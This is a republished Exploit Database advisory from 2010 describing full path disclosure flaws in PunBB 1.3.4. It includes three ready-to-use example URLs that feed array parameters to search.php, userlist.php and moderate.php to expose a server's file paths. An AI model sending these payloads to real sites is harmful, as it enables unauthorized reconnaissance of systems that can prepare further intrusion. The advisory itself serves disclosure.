Punbb 1.3.4 – Multiple Full Path Disclosures

• Exploit Database
• 35 阅读

• 作者： SYSTEM_OVERIDE
  日期： 2010-11-07
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/15452/

• # Exploit Title: Punbb 1.3.4 Full Path Disclosure
  # Date: 07/11/2010
  # Author: SYSTEM_OVERIDE, OverSecurityCrew
  # Software Link: http://punbb.informer.com/
  # Vulnerability Type: Full Path Disclosure
  # Version: 1.3.4
  
  
  Vulnerability Details:
  
  The
  vulnerabilities are in the file and the file /search.php, /userlist.php
  and moderate.php not properly control the content of variables 
  keywords, author and get_host.
  An attacker can exploit this to find out the rootpath a website.
  
  Example:
  
  http://www.site.com/[path]/search.php?action=search&keywords[]=&author[]=&search_in=all&sort_by=0&SORT_DAshow_as=DESC&topics=&search=Submit+search
  http://www.site.com/[path]/userlist.php?username[]=&show_group=-1&sort_by=username&sort_dir=ASC&search=Avvia+ricerca
  http://www.site.com/[path]/moderate.php?get_host[]=
  
  
  #SYSTEM_OVERIDE [07-11-2010]